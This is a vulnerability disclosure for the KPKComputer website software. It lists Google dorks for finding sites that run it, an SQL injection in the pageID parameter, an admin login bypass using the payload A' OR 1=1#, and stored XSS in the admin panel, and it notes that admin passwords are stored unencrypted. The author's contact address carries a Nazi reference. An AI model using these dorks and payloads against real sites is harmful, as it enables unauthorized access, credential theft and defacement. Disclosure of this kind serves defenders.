#############################################################################
[+] Title: KPKComputer - Multiple Vulnerabilities
[+] Author: LIL-ICY (berlin@hitler.rocks)
[+] Date Release: November 7, 2019
[+] Google Dork: "Powered by KPKComputer"
Google Dork2: "Powered by KPKComputer" inurl:index.php?pageID=
[+] Vendor: KPKComputer
[-] Homepage: http://www.kpkcomputer.com/
[-] Download: N/A
[-] Vulnerable Version: Latest, All
[-] Tested Version: Latest, on a localhost
#############################################################################
------------------------------------------------------------------------------------------
Vulnerability #1 : Unauthorized SQL Injection
Risk: High
File Path: http://localhost/index.php?pageID=[SQL INJECTION HERE]
Worth mentioning: Admin passwords are not encrypted in database.
------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------
Vulnerability #2 : Bypass admin page authentication [SQLi]
Risk: High
File Path: http://localhost/admin/
Method: POST
User: A' OR 1=1#
Pass: A' OR 1=1#
------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------
Vulnerability #3 : Authorized stored XSS
Risk: High [one could deface/change the entire home page after gaining admin access which is not that hard apparently from the previous exploits]
File Path: http://localhost/admin/admin.php?mode=website&task=add_edit&itemid=80
Method: POST
Most parameters/inputs are not protected against XSS.
------------------------------------------------------------------------------------------
- Be safe